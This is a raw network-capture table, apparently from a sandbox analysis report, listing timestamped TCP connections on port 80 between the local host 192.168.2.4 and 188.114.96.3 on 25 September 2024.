                  Sep 25, 2024 15:29:49.682168007 CEST8055954188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:50.344510078 CEST8055954188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:50.344615936 CEST5595480192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:50.344908953 CEST8055954188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:50.344949007 CEST5595480192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:50.349452972 CEST8055954188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:50.511046886 CEST5595580192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:50.516055107 CEST8055955188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:50.516130924 CEST5595580192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:50.519201994 CEST5595580192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:50.524121046 CEST8055955188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:50.524173975 CEST5595580192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:50.529016972 CEST8055955188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:51.275609016 CEST8055955188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:51.275783062 CEST5595580192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:51.276854992 CEST8055955188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:51.276935101 CEST5595580192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:51.280706882 CEST8055955188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:51.416181087 CEST5595680192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:51.421195030 CEST8055956188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:51.421293974 CEST5595680192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:51.423162937 CEST5595680192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:51.428138971 CEST8055956188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:51.428231955 CEST5595680192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:51.433537006 CEST8055956188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:52.197736025 CEST8055956188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:52.197835922 CEST5595680192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:52.198797941 CEST8055956188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:52.198848009 CEST5595680192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:52.202676058 CEST8055956188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:52.529314995 CEST5595780192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:52.534239054 CEST8055957188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:52.534328938 CEST5595780192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:52.536717892 CEST5595780192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:52.541551113 CEST8055957188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:52.541642904 CEST5595780192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:52.548624992 CEST8055957188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:53.229687929 CEST8055957188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:53.229813099 CEST5595780192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:53.230206013 CEST8055957188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:53.230273008 CEST5595780192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:53.234693050 CEST8055957188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:53.370002985 CEST5595880192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:53.375433922 CEST8055958188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:53.375535965 CEST5595880192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:53.377525091 CEST5595880192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:53.383038998 CEST8055958188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:53.383135080 CEST5595880192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:53.388670921 CEST8055958188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:54.101306915 CEST8055958188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:54.101488113 CEST5595880192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:54.102031946 CEST8055958188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:54.102094889 CEST5595880192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:54.106348038 CEST8055958188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:54.245740891 CEST5595980192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:54.250874996 CEST8055959188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:54.250950098 CEST5595980192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:54.253329039 CEST5595980192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:54.258167028 CEST8055959188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:54.258505106 CEST5595980192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:54.263367891 CEST8055959188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:54.970730066 CEST8055959188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:54.972057104 CEST8055959188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:54.972069025 CEST5595980192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:54.972112894 CEST5595980192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:54.976955891 CEST8055959188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:55.407907009 CEST5596080192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:55.415240049 CEST8055960188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:55.415309906 CEST5596080192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:55.418677092 CEST5596080192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:55.425712109 CEST8055960188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:55.425796032 CEST5596080192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:55.432951927 CEST8055960188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:56.064028978 CEST8055960188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:56.064141035 CEST5596080192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:56.064490080 CEST8055960188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:56.064560890 CEST5596080192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:56.069026947 CEST8055960188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:56.212359905 CEST5596180192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:56.217426062 CEST8055961188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:56.217494965 CEST5596180192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:56.219639063 CEST5596180192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:56.224555016 CEST8055961188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:56.224618912 CEST5596180192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:56.229465961 CEST8055961188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:56.901269913 CEST8055961188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:56.901469946 CEST5596180192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:56.901814938 CEST8055961188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:56.901870012 CEST5596180192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:56.906316042 CEST8055961188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:57.040164948 CEST5596280192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:57.045118093 CEST8055962188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:57.045285940 CEST5596280192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:57.047328949 CEST5596280192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:57.052107096 CEST8055962188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:57.052272081 CEST5596280192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:57.057117939 CEST8055962188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:57.735141993 CEST8055962188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:57.735296965 CEST5596280192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:57.736435890 CEST8055962188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:57.736490965 CEST5596280192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:57.741466999 CEST8055962188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:58.146569967 CEST5596380192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:58.154551983 CEST8055963188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:58.154656887 CEST5596380192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:58.156909943 CEST5596380192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:58.164894104 CEST8055963188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:58.164944887 CEST5596380192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:58.172955990 CEST8055963188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:58.842067957 CEST8055963188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:58.842379093 CEST8055963188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:58.842437029 CEST5596380192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:58.842485905 CEST5596380192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:58.847290039 CEST8055963188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:58.975866079 CEST5596480192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:58.980962038 CEST8055964188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:58.981086016 CEST5596480192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:58.983046055 CEST5596480192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:58.987847090 CEST8055964188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:58.987926960 CEST5596480192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:58.992954969 CEST8055964188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:59.669751883 CEST8055964188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:59.669969082 CEST5596480192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:59.671691895 CEST8055964188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:59.671768904 CEST5596480192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:59.674829006 CEST8055964188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:59.823797941 CEST5596580192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:59.828731060 CEST8055965188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:59.828810930 CEST5596580192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:59.830913067 CEST5596580192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:59.835778952 CEST8055965188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:59.835834980 CEST5596580192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:59.840722084 CEST8055965188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:00.558449030 CEST8055965188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:00.558633089 CEST5596580192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:00.558897018 CEST8055965188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:00.558938980 CEST5596580192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:00.564280033 CEST8055965188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:00.701694012 CEST5596680192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:00.706685066 CEST8055966188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:00.706866980 CEST5596680192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:00.711074114 CEST5596680192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:00.715938091 CEST8055966188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:00.716017962 CEST5596680192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:00.721501112 CEST8055966188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:01.627257109 CEST8055966188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:01.627418041 CEST5596680192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:01.627676964 CEST8055966188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:01.627752066 CEST5596680192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:01.632246017 CEST8055966188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:01.775707006 CEST5596780192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:01.913722038 CEST8055967188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:01.913819075 CEST5596780192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:01.915862083 CEST5596780192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:01.920701027 CEST8055967188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:01.920768023 CEST5596780192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:01.925667048 CEST8055967188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:02.596066952 CEST8055967188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:02.596189022 CEST5596780192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:02.596564054 CEST8055967188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:02.596606970 CEST5596780192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:02.601053953 CEST8055967188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:02.746201038 CEST5596880192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:02.752753973 CEST8055968188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:02.752851009 CEST5596880192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:02.754868031 CEST5596880192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:02.761226892 CEST8055968188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:02.761282921 CEST5596880192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:02.766079903 CEST8055968188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:03.523556948 CEST8055968188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:03.523662090 CEST5596880192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:03.523982048 CEST8055968188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:03.524028063 CEST5596880192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:03.528471947 CEST8055968188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:03.864386082 CEST5596980192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:03.869379997 CEST8055969188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:03.869481087 CEST5596980192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:03.941581011 CEST5596980192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:03.946427107 CEST8055969188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:03.946516037 CEST5596980192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:03.951317072 CEST8055969188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:05.068569899 CEST8055969188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:05.068828106 CEST5596980192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:05.069282055 CEST8055969188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:05.069371939 CEST5596980192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:05.073628902 CEST8055969188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:05.210833073 CEST5597080192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:05.218031883 CEST8055970188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:05.218113899 CEST5597080192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:05.220174074 CEST5597080192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:05.226355076 CEST8055970188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:05.226429939 CEST5597080192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:05.233550072 CEST8055970188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:06.054195881 CEST8055970188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:06.054434061 CEST5597080192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:06.056499004 CEST8055970188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:06.056555033 CEST5597080192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:06.059293032 CEST8055970188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:06.201776981 CEST5597180192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:06.433116913 CEST8055971188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:06.433270931 CEST5597180192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:06.435375929 CEST5597180192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:06.440186977 CEST8055971188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:06.440248966 CEST5597180192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:06.445102930 CEST8055971188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:07.461065054 CEST8055971188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:07.461082935 CEST8055971188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:07.461090088 CEST8055971188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:07.461170912 CEST8055971188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:07.461246967 CEST5597180192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:07.461246967 CEST5597180192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:07.461247921 CEST5597180192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:07.461247921 CEST5597180192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:07.466088057 CEST8055971188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:07.602101088 CEST5597280192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:07.607044935 CEST8055972188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:07.607125044 CEST5597280192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:07.608885050 CEST5597280192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:07.613642931 CEST8055972188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:07.613698006 CEST5597280192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:07.618702888 CEST8055972188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:08.369697094 CEST8055972188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:08.370199919 CEST8055972188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:08.370282888 CEST5597280192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:08.373850107 CEST5597280192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:08.379045010 CEST8055972188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:08.508213997 CEST5597380192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:08.513225079 CEST8055973188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:08.513335943 CEST5597380192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:08.515196085 CEST5597380192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:08.520134926 CEST8055973188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:08.520224094 CEST5597380192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:08.525161982 CEST8055973188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:09.181221962 CEST8055973188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:09.181371927 CEST5597380192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:09.181853056 CEST8055973188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:09.181921959 CEST5597380192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:09.189851999 CEST8055973188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:09.323792934 CEST5597480192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:09.330323935 CEST8055974188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:09.330414057 CEST5597480192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:09.332556009 CEST5597480192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:09.339314938 CEST8055974188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:09.339417934 CEST5597480192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:09.345881939 CEST8055974188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:10.051428080 CEST8055974188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:10.051609039 CEST5597480192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:10.051678896 CEST8055974188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:10.051755905 CEST5597480192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:10.056504011 CEST8055974188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:10.208034039 CEST5597580192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:10.212961912 CEST8055975188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:10.213043928 CEST5597580192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:10.215982914 CEST5597580192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:10.220859051 CEST8055975188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:10.220925093 CEST5597580192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:10.226315975 CEST8055975188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:10.861635923 CEST8055975188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:10.861804008 CEST5597580192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:10.862324953 CEST8055975188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:10.862375021 CEST5597580192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:10.866580009 CEST8055975188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:11.012744904 CEST5597680192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:11.017745018 CEST8055976188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:11.017930984 CEST5597680192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:11.020920038 CEST5597680192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:11.025988102 CEST8055976188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:11.026164055 CEST5597680192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:11.031032085 CEST8055976188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:12.048547983 CEST8055976188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:12.048794031 CEST5597680192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:12.050790071 CEST8055976188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:12.050899029 CEST5597680192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:12.057825089 CEST8055976188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:12.204458952 CEST5597780192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:12.209537983 CEST8055977188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:12.209623098 CEST5597780192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:12.213246107 CEST5597780192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:12.218105078 CEST8055977188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:12.218161106 CEST5597780192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:12.222979069 CEST8055977188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:12.921641111 CEST8055977188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:12.921662092 CEST8055977188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:12.921665907 CEST8055977188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:12.921894073 CEST5597780192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:12.924000025 CEST5597780192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:12.928806067 CEST8055977188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:13.153594017 CEST5597880192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:13.161761045 CEST8055978188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:13.161860943 CEST5597880192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:13.167393923 CEST5597880192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:13.173727036 CEST8055978188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:13.173782110 CEST5597880192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:13.179995060 CEST8055978188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:13.838912010 CEST8055978188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:13.839050055 CEST5597880192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:13.839246035 CEST8055978188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:13.839293003 CEST5597880192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:13.843863010 CEST8055978188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:13.980905056 CEST5597980192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:13.985996962 CEST8055979188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:13.986187935 CEST5597980192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:13.988409042 CEST5597980192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:13.993266106 CEST8055979188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:13.993422985 CEST5597980192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:13.998311996 CEST8055979188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:14.665118933 CEST8055979188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:14.665373087 CEST5597980192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:14.665400982 CEST8055979188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:14.665448904 CEST5597980192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:14.670222998 CEST8055979188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:14.825773001 CEST5598080192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:14.830910921 CEST8055980188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:14.831100941 CEST5598080192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:14.834512949 CEST5598080192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:14.842472076 CEST8055980188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:14.842546940 CEST5598080192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:14.847471952 CEST8055980188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:15.525509119 CEST8055980188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:15.525572062 CEST8055980188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:15.525636911 CEST5598080192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:15.527673006 CEST5598080192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:15.531017065 CEST8055980188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:15.532588959 CEST8055980188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:15.532668114 CEST5598080192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:15.678278923 CEST5598180192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:15.683224916 CEST8055981188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:15.683306932 CEST5598180192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:15.686281919 CEST5598180192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:15.691152096 CEST8055981188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:15.691270113 CEST5598180192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:15.696103096 CEST8055981188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:16.351320982 CEST8055981188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:16.351399899 CEST8055981188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:16.351548910 CEST5598180192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:16.352452993 CEST5598180192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:16.357320070 CEST8055981188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:16.537952900 CEST5598280192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:16.543148994 CEST8055982188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:16.543256998 CEST5598280192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:16.545212030 CEST5598280192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:16.551738977 CEST8055982188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:16.551798105 CEST5598280192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:16.558212042 CEST8055982188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:17.329895020 CEST8055982188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:17.330143929 CEST5598280192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:17.330900908 CEST8055982188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:17.331113100 CEST5598280192.168.2.4188.114.96.3
